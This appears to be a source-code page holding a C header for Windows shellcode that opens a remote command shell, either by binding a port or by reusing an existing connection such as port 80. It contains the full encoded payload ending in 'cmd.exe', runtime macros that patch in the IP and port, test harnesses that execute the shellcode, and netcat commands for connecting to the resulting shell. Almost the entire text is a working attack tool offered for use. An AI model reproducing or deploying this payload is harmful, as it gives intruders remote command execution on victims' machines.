📄 winshellcode7.txt
字号:
******************************************************************************
. Designed for any version NT plamform
. Can reuse port, such as 80
. Can reuse connect, shellcode search valid connect by peer ip and peer port
. Could autobind local address for reuse port
. Resume work when reconnect after disconnect
. Use "exit" to quit
******************************************************************************/
/*****************************************************************************
test program for reuse connect
------------------------------------------------------------------------------
#include ".h"
main()
{
ShellcodeSetRunType(ShellcodeRunReuseSock);
ShellcodeBindIP(inet_addr("192.168.0.5"));
ShellcodeBindPort(99);
((void (*)(void)) &shellcode)();
}
nc -p 99 192.168.0.1 80
******************************************************************************
test program for bind port
------------------------------------------------------------------------------
#include ".h"
main()
{
ShellcodeSetRunType(ShellcodeRunListenPort);
ShellcodeBindIP(0x0UL);
ShellcodeBindPort(99);
((void (*)(void)) &shellcode)();
}
nc 192.168.0.1 99
******************************************************************************/
#ifndef WINSHELLCODE_H
#define WINSHELLCODE_H
#define CODEBYTE 0x61
//var ofs for modify in runtime
#define ShellCodeRunTypeOfs 0xe00
#define ShellCodePortOfs 0xe0a
#define ShellCodeIPOfs 0xe02
//used for ShellcodeSetRunType
#define ShellcodeRunListenPort 0
#define ShellcodeRunReuseSock 1
#define ShellcodeAutoBindIP 0x0ffffffffUL
#define ShellcodeSetRunType(x)\
{\
shellcode[ShellCodeRunTypeOfs] = CODEBYTE + ((x) & 0xff) % 0x10;\
shellcode[ShellCodeRunTypeOfs+1] = CODEBYTE + ((x) & 0xff) / 0x10;\
}
#define ShellcodeBindPort(x)\
{\
shellcode[ShellCodePortOfs] = CODEBYTE + ((x >> 8) & 0xff) % 0x10;\
shellcode[ShellCodePortOfs+1] = CODEBYTE + ((x >> 8) & 0xff) / 0x10;\
shellcode[ShellCodePortOfs+2] = CODEBYTE + ((x) & 0xff) % 0x10;\
shellcode[ShellCodePortOfs+3] = CODEBYTE + ((x) & 0xff) / 0x10;\
}
#define ShellcodeBindIP(x)\
{\
shellcode[ShellCodeIPOfs] = CODEBYTE + ((x) & 0xff) % 0x10;\
shellcode[ShellCodeIPOfs+1] = CODEBYTE + ((x) & 0xff) / 0x10;\
shellcode[ShellCodeIPOfs+2] = CODEBYTE + ((x >> 8) & 0xff) % 0x10;\
shellcode[ShellCodeIPOfs+3] = CODEBYTE + ((x >> 8) & 0xff) / 0x10;\
shellcode[ShellCodeIPOfs+4] = CODEBYTE + ((x >> 16) & 0xff) % 0x10;\
shellcode[ShellCodeIPOfs+5] = CODEBYTE + ((x >> 16) & 0xff) / 0x10;\
shellcode[ShellCodeIPOfs+6] = CODEBYTE + ((x >> 24) & 0xff) % 0x10;\
shellcode[ShellCodeIPOfs+7] = CODEBYTE + ((x >> 24) & 0xff) / 0x10;\
}
unsigned char shellcode[]=
"\x90\xeb\x05\x90\x5f\x90\xeb\x05\xe8\xf7\xff\xff\xff\x8d\x6f\x2f"
"\x90\x90\x90\x90\x8b\xf5\x8b\xfd\x33\xc9\xb1\xe9\x90\xb5\x06\xfc"
"\x66\xad\x90\x2c\x61\x80\xec\x61\xc0\xe4\x04\x02\xc4\xaa\xe2\xf0"
"\xac\xaa\x3c\x24\x75\xfa\x90\x32\xc0\x88\x47\xff"
"ioijeaaaaaiokbfaaaaaiodgcaaaaajifioifaaaaaioggcaaaaaiognbaaaaaji"
"fikjfaaaaaainlcogaaaaabaehpaajajajajiohkdaaaaajificjfaaaaalificj"
"faaaaaiohicaaaaajifigjfaaaaaioofaaaaaaiobjaaaaaadiipaaehaolifigj"
"faaaaaafppfjifgaaaaalificjfaaaaaafppfjifgaaaaalifikhfaaaaaafppfj"
"bnfaaaaalifigifaaaaaafppfjbnfaaaaailaaaaaaaaaflifikjfaaaaaafppfj"
"abgaaaaailaaaaaaaaafppfjbcgaaaaadmlifigjfaaaaakgaakgjbnifianaaaa"
"aaaflifigjfaaaaaafppfjoegaaaaadmnakaigehehahkdpcpchhhhhhocdhfhog"
"ihocpgchhgnakanakaigajaaaaaappfjkagaaaaalifikhfaaaaaiogmaaaaaadi"
"ippppaeiglaaaaaadiipaaehhfajajajajkgaanifikifaaaaaafigaaeaaaaali"
"fioifaaaaaaflifikhfaaaaaafppfjbagaaaaadiipaapaeiciaaaaaakgaalifi"
"kifaaaaaaflifioifaaaaaaflifigjfaaaaaafppfjoegaaaaadiipppehegajaj"
"ajajlofikgaaigaaeaaaaalifioifaaaaaaflifigjfaaaaaafppfjdfgaaaaadi"
"ipaaehodajajajajdiipppehfdajajajajddlndfninjkifaaaaadfaflifioifa"
"aaaaaflifigifaaaaaafppfjhpfaaaaadiipaaehjaajajajajjolcppppppddam"
"iedmddamdmddlndfninjbpbaaaaadfddlndfdfdfafppfjnnfaaaaadiipaaehla"
"ajajajajlifibpbaaaaadmilppppppppdmaaaaaaaalifioifaaaaahmaaeeaaaa"
"aaafppfjclfaaaaalinjoifaaaaalifiohfaaaaajideaejidemdlificifaaaaa"
"jideidilbabaaaaajidemcggilaaaaggjideaddfdfddamafafafaeafieafafni"
"fijogaaaaaafddamafppfjcmfaaaaalifiohfaaaaaafppfjbnfaaaaalificifa"
"aaaaafppfjbnfaaaaalifioifaaaaaliaadmigaaeaaaaakgaeppfjlofaaaaadm"
"ddamafnifidmcaaaaahmaamaaaaaaaafnifiohfaaaaaafnifikhfaaaaaafppfj"
"hkfaaaaaddamafnifidmcaaaaaafnifigifaaaaaafnificifaaaaaafppfjhkfa"
"aaaadmaaaaaaaaaaaaaaaabaaaaaaaainlcogaaaaaaaehdhajajajajkgacppfj"
"kagaaaaakgaaifaendaaaabaaaphaoafninjmhdaaaaahmdaabaaaaaadfninjcn"
"gaaaaadfafppfjakgaaaaadiipaafhgnlinjgngaaaaaldnjdogaaaaafhimggli"
"njengaaaaaggldnjhogaaaaafhilifafninjmhdaaaaahmdaaaaaaaaadfigohgg"
"eaaiafppfjejgaaaaaifdmafkgacppfjkagaaaaaifafninjmhdaaaaahmdaabaa"
"aaaadfninjcngaaaaadfafppfjhegaaaaadiipaaliinifmhcnlidmdmaaaaaaaa"
"kgdbnifikmdaaaaaafppfjpggaaaaanifikmdaaaaaafppfjlhgaaaaadiipaaeh"
"ccajajajajliahmaliopmpnkdiipaaehdbajajajajliaamdkaehapmdamehmomd"
"mkehiodmlihpnkliaadmaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaalifi"
"oifaaaaaafkgcappfjeggaaaaakgaakgbakgcappfjedgaaaaadiippppaeiijaa"
"aaaajificjfaaaaaninjkifaaaaahmdabaaaaaaakgeadfkgeaigppppaaaaafpp"
"fjjigaaaaadiipaafhahajajajajgglifihogaaaaaggjifiengaaaaalifidoga"
"aaaajifigngaaaaadiipppfhpaajajajajiokcppppppjifigngaaaaalificjfa"
"aaaakgabninjcngaaaaadfafppfjldgaaaaadiipaafhdcajajajajkgfalificj"
"faaaaaafppfjaegaaaaadiipaafhlaajajajajlificjfaaaaadmddamdmilaaaa"
"bphhbiidnekfajaaehhaajajajajielobpliinlidhmddadplighihdadpliohac"
"dalplioeebddcngfhfbflipddalpniflllgaaaaaddjmblhadpgghkehmaajajaj"
"ajjfpfdihmeacecopnjfpfoflikmligeecdadmbnbodabmddjmggliialigembda"
"dmbmbocadabmliaadadmjifiomgaaaaalidmninjokgaaaaaioafaaaaaajifikm"
"gaaaaadmninlojfaaaaalihmhfiopcaaaaaapfafcdamddjmhpbnmpcpokifaipd"
"aaehhbajajajajafhflipnionbaaaaaapfjihaifhehehehelojnheaipdaafhkm"
"dmdfninjkmgaaaaaafppdblfdmhfninlomgaaaaadfafpphbpfdmaaaaaaaaaaaa"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaalefe"
"cfoefemeddcdaadechfgbgehfgafjgahfgaahefgehdfehbgchehfhahjeogggpg"
"beaadechfgbgehfgafchpgdgfgdhdhbeaademgpgdhfgiebgogegmgfgaaaffgfg"
"lgoebgngfgegafjgahfgaahemgpgcgbgmgbemgmgpgdgaahfchjgehfggejgmgfg"
"aacffgbgeggejgmgfgaadfmgfgfgahaaeffgchngjgogbgehfgafchpgdgfgdhdh"
"aafeihjgehefigchfgbgegaaaahfdfcdpfddcdaadhpgdglgfgehaacgjgogegaa"
"mgjgdhehfgogaabgdgdgfgahehaadhfgogegaachfgdgghaadgmgpgdhfgdhpgdg"
"lgfgehaahfdfbedfehbgchehfhahaahgfgehigpgdhehogbgngfgaahgfgehigpg"
"dhehcgjhogbgngfgaadhfgehdhpgdglgpgahehaajgpgdgehmgdhpgdglgfgehaa"
"hgfgehahfgfgchogbgngfgaaaaaamepgbgegmejgcgchbgchjhbeaahefgehafch"
"pgdgbeegegchfgdhdhaaaaaaaaaaaaaaaaaacaaaaadgaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaaaaaaaaaadg"
"cmd.exe$";
#endif //WINSHELLCODE_H
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -